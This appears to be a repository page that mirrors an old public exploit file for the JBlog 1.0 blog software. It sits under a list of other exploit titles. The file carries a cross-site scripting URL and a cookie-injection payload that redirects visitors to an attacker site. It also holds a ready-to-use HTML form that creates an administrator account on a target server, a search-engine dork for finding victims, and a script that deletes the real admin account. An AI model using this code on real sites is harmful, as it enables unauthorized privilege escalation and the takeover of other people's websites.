477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
130 lines
5.1 KiB
HTML
Executable file
130 lines
5.1 KiB
HTML
Executable file
<!--
|
|
##############################################################################
|
|
# Script...............: JBlog version: 1.0 #
|
|
# Script Site..........: http://www.jmuller.net/jblog #
|
|
# Vulnerability........: Creat Admin exploit, xss, Cookie Manipulation #
|
|
# Access...............: Remote #
|
|
# level................: Dangerous #
|
|
# Author...............: S4mi #
|
|
# Contact..............: S4mi[at]LinuxMail.org #
|
|
# #
|
|
##############################################################################
|
|
|
|
cookies Manipulation + Cross Site Scripting :
|
|
=========================================================================
|
|
xss:
|
|
----
|
|
http://site.com/jblog/index.php?id=">[xss Here]&pcomm=com
|
|
|
|
cookies Manipulation:
|
|
--------------------
|
|
The POST variable 'search' in /jblog/recherche.php also The Cookie variable 'theme' is affected and can be set to :
|
|
|
|
<meta http-equiv='Set-cookie' content='name=value'>
|
|
|
|
also we can do this :
|
|
|
|
<meta http-equiv='Set-cookie' content='theme=<body+onload=alert("owned_by_Hacker")>'>
|
|
|
|
or :
|
|
|
|
<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://Bad.site.com/">'>
|
|
|
|
This is a small exemple of Inject Cookie Xploit (Cookie Manipulation)
|
|
---------------------------------------------------------------------------
|
|
<html>
|
|
<head>
|
|
<title>Inject Cookie Xploit By S4mi</title>
|
|
</head>
|
|
<body>
|
|
<script language="JavaScript">
|
|
function JBlogxpl()
|
|
{
|
|
document.xploit.action=document.xploit.victim.value;
|
|
document.xploit.submit();
|
|
}
|
|
</script>
|
|
<form name="xploit" method="post" action="">
|
|
<input type="hidden" name="victim" value="http://victim/jblog/recherche.php">
|
|
<input type="hidden" name="search" value="<meta http-equiv='Set-cookie' content='theme=<body+onload=document.location="http://milw0rm.com/">'>" />
|
|
<script>document.location="javascript: JBlogxpl()"</script>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
============================================================================
|
|
|
|
Remote Privilege Escalation "Creat New Admin Xploit" By S4mi :
|
|
============================================================================
|
|
-->
|
|
|
|
<html>
|
|
<title>JBlog 1.0 -- Remote Privilege Escalation (Creat admin sploit) -- By S4mi</title>
|
|
<body>
|
|
<script language="JavaScript">
|
|
function JBlogxpl() {
|
|
if (document.xploit.victim.value=="") {
|
|
alert("Please enter target!");
|
|
return false;
|
|
}
|
|
{
|
|
xploit.action="http://"+document.xploit.victim.value+"admin/ajoutaut.php";
|
|
xploit.mot.value=document.xploit.mot.value;
|
|
xploit.droit.value=document.xploit.droit.value;
|
|
xploit.submit();
|
|
}
|
|
}
|
|
|
|
</script>
|
|
<strong><p>
|
|
-------------------------------------------------------------------------------------------<br>
|
|
#JBlog 1.0 -- Remote Privilege Escalation Xploit (add user)<br>
|
|
# Discovered By...............: S4mi <br>
|
|
# Contact..........................: S4mi[at]LinuxMail.org<br>
|
|
#<br>
|
|
# Google Dork : "propulsé par JBlog" <br>
|
|
--------------------------------------------------------------------------------------------</p>
|
|
<form name="xploit" method="POST" onSubmit="JBlogxpl();">
|
|
Target -> Http://
|
|
<input type="text" name="victim" value="www.Site.com/Path/" size="44">
|
|
<p> Username.......->
|
|
<input type="text" name="mot" value="ZaZ" size="30">
|
|
(your password will be by default: <i>"admin"</i>)</p>
|
|
<p> User type......->
|
|
<select name="droit">
|
|
<option value="3">Admin</option>
|
|
<option value="2">Moderator</option>
|
|
<option value="1">Editor</option>
|
|
</select>
|
|
</p>
|
|
<p>Submit...........->
|
|
<input name="submit" type="submit" value=" Xploit it ">
|
|
</p>
|
|
</form>
|
|
<br>---------------------------------------------------------------------------------------<br>
|
|
#NB : Remember do not use a probably existing username (such as "admin"). <br>
|
|
#If you want to Delete real admin account :D login into your New Created admin account & use this :<br>
|
|
--------------------------------------------------------------------------------------------<p>
|
|
<script language="JavaScript">
|
|
|
|
function AdminDelete()
|
|
{ if (document.xploit.victim.value=="") {
|
|
alert("Please enter target!");
|
|
return false;
|
|
}
|
|
if(confirm('Are you Sure!! want really DELETE user ?'))
|
|
document.location.href="http://"+document.xploit.victim.value+"admin/supauteur.php?cat="+document.userdel.id.value;
|
|
}
|
|
</script>
|
|
<form name="userdel" method="POST" onSubmit="">
|
|
ID...............> <input type="text" name="id" value="1" size="3">
|
|
</form>
|
|
<a href="#" OnClick="AdminDelete()"/>Delete</a>
|
|
|
|
<br>-----------------------------------------------------------------------------------------------<br>
|
|
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39, Black-Code, Nuck3r... & all who know Me!
|
|
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2007-07-21]
|